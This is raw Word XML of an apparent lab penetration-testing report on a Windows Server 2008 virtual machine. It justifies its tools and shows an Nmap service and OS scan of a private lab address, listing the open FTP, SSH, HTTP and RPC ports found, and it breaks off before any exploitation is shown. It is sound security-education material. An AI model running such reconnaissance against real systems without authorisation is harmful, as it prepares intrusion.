    <w:p w14:paraId="5541B838" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="118"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc23315"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Introduction </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="554513C9" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="363" w:lineRule="auto"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Continuing cyber threats are becoming increasingly complex; therefore, a proactive need for vulnerability analysis is upheld for a strong cybersecurity approach. Vulnerability assessment is the discovery, evaluation, and ranking of security flaws in a system. The step-by-step procedure followed by our collective members to investigate a compromised Windows Server 2008 virtual environment is the subject of the following section. Team members engaged with software such as Nmap, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Metasploit, Hydra, enum4linux, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to investigate and exploit one critical vulnerability each. We did this by trying to recreate a real penetration scenario and provide specific recommendations to improve the system </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> against future attacks (Karen Scarfone, 2008). </w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5614DEE2" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc23316"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.0 Vulnerability Scanning Strategy &amp; Tool Justification  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="79B76E46" w14:textId="5BA93710" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="82"/>
        <w:ind w:left="-5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc23317"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00F5636D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>FTP Anonymous Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="0D0E5C08" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="4516"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Operating System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Windows Server 2008 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Selected Tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9352" w:type="dxa"/>
        <w:tblInd w:w="5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="57" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2607"/>
        <w:gridCol w:w="6745"/>
      </w:tblGrid>
      <w:tr w:rsidR="0086222C" w14:paraId="396B5E0B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AED6842" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="1" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Tool </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6745" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00C5A584" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="5" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Purpose </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0086222C" w14:paraId="7121EF07" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="423"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6703A276" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="5" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nmap </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6745" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="117C85B3" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="8" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Network scanning and service identification </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0086222C" w14:paraId="332098CA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3DDBD8ED" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="6" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Nikto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6745" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="361DDFD4" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="9" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HTTP service vulnerability scanning </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04924FE2" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="322" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0F440D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Justification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B29457" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="130"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nmap was run in search of open ports and running services on the victim. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF1C3EC" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="212" w:line="396" w:lineRule="auto"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to scan a web server for outdated software, default files and known vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF5E105" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="114" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3387"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc23318"/>
      <w:r>
        <w:t xml:space="preserve">2.1.1 Technical Steps &amp; Screenshots </w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="09C63DB5" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="538" w:lineRule="auto"/>
        <w:ind w:right="5102" w:hanging="226"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Nmap </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Scan  Command</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153A07C6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="313"/>
        <w:ind w:left="730" w:right="147"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -O -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.240.129 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E48E130" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF3D95B" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="313"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Identify open ports, detect service versions, and determine the OS running on the target machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E6800E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CB66A2" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="129"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nmap detected open ports: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002D54FC" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="125"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">21 (FTP – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EasyFTP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6621EC09" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="127"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22 (SSH) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6900B8" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="129"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8080 (HTTP – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EasyHTTP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Server httpd) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4D66D6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Several RPC services (135, 139, 445, 1024 – 1030) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F1154" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="308" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="-22" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74EE0F48" wp14:editId="6BCD3244">
                <wp:extent cx="6058865" cy="3675025"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="18616" name="Group 18616"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6058865" cy="3675025"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6058865" cy="3675025"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="984" name="Rectangle 984"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6020765" y="3175610"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="45E8ADEB"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5" name="Rectangle 985"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3506318"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="59B6CB1A" w14:textId="77777777" w:rsidR="0086222C"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99" name="Picture 999"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="37795" y="14351"/>
                            <a:ext cx="5943600" cy="3252470"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1000" name="Shape 1000"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="23508" y="0"/>
                            <a:ext cx="5972175" cy="3281045"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5972175" h="3281045">
                                <a:moveTo>
                                  <a:pt x="0" y="3281045"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5972175" y="3281045"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="597217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16" style="width:477.076pt;height:289.372pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="60588,36750">
                <v:rect id="Rectangle 984" style="position:absolute;width:506;height:2243;left:60207;top:31756;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 985" style="position:absolute;width:506;height:2243;left:0;top:3506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999" style="position:absolute;width:59436;height:32524;left:377;top:143;" filled="f">
                  <v:imagedata r:id="rId13"/>
                </v:shape>
                <v:shape id="Shape 1000" style="position:absolute;width:59721;height:32810;left:235;top:0;" coordsize="5972175,3281045" path="m0,3281045l5972175,3281045l5972175,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F8D1CE" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="274" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C95A346" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A5B3A8" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EA1E5B" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9B593C" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="276" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB13E9" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF7A590" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="274" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76976FEF" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAE0FDF" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A3B527" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D697C87" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DAF520" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA9B4D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
